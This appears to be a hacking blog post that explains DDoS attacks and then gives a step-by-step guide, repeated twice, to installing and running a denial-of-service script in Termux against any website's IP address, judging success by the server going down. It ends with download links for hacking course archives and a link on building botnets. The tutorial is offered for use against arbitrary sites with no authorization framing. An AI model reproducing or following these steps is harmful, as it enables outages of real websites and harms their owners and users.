What is DDOS attack? How to do DDOS on any website?
DDOS - Distibuted Denial Of Service attack. It is a cyber attack that used to take the server slow down of any website.In a distributed denial-of-service attack(DDoS attack), the incoming traffic flooding the victim originates from many different sources. This effectively makes it impossible to stop the attack simply by blocking a single source.
Distributed Denial of Service (DDoS) attacks have entered the 1 Tbps DDoS attack era. However, Radware research shows that DDoS attacks are not just getting bigger; they’re also getting more sophisticated. Hackers are constantly coming up with new and innovative ways of bypassing traditional DDoS defenses and compromise organizations’ service availability
In October 2016 DNS provider Dyn was hit by a major DDoS (Distributed Denial of Service) attack by an army of IoT devices which had been hacked specially for the purpose. Over 14,000 domains using Dyn's services were overwhlemed and became unreachable including big names like Amazon, HBO, and PayPal.
As we usually says that when a website is not loading we say i think server is down. So this is the thing a hacker takes advantage.
Every website has a limit which says that per second only a particular number of visitors can visit same website.
For example we assume that a website has a limit of 50 peoples to visit in every 1 second and if more than 50 members or visitors view this website at a same time then it will go slow down and we call that server is down of same website
TRICKS TO CREATE A DDOS ATTACKS
TRICKS TO CREATE A DDOS ATTACKS
Now you need to do some operations in termux terminal:-:-
apt update && apt upgrade
apt install git
git clone https://github.com/cyweb/hammer
ls
cd hammer
chmod +x hammer.py
apt install python3
python3 hammer.py -s (ip of the website) -t NUM
(Open new session)
Type nslookup (website)
You would get the ip address of the website copy it
Return to the previous session and again type the ip address of the website in the space. And in place of NUM write 150.
The whole command would like this - python3 hammer.py -s (ip address of the website) -t NUM.
After typing this command the attack would start.
Wait for it when it shows no connection! server maybe down. The attack is successful.
Caution :- Your device may slow down after the attack.
apt install git
git clone https://github.com/cyweb/hammer
ls
cd hammer
chmod +x hammer.py
apt install python3
python3 hammer.py -s (ip of the website) -t NUM
(Open new session)
Type nslookup (website)
You would get the ip address of the website copy it
Return to the previous session and again type the ip address of the website in the space. And in place of NUM write 150.
The whole command would like this - python3 hammer.py -s (ip address of the website) -t NUM.
After typing this command the attack would start.
Wait for it when it shows no connection! server maybe down. The attack is successful.
Caution :- Your device may slow down after the attack.
Download :- Evading IDS, Firewalls, and Honeypots.rar
Download :- Hacking wireless networks.rar
Download :- Malware threats.rar
Download :- Mobile platforms.rar
Download :- Udemy-learn-kali-linux-and-hack-android-mobile-devices.rar
Read Also;
How To Create Botnets for DDoS Attacks - (ufonet method)
No comments:
Post a Comment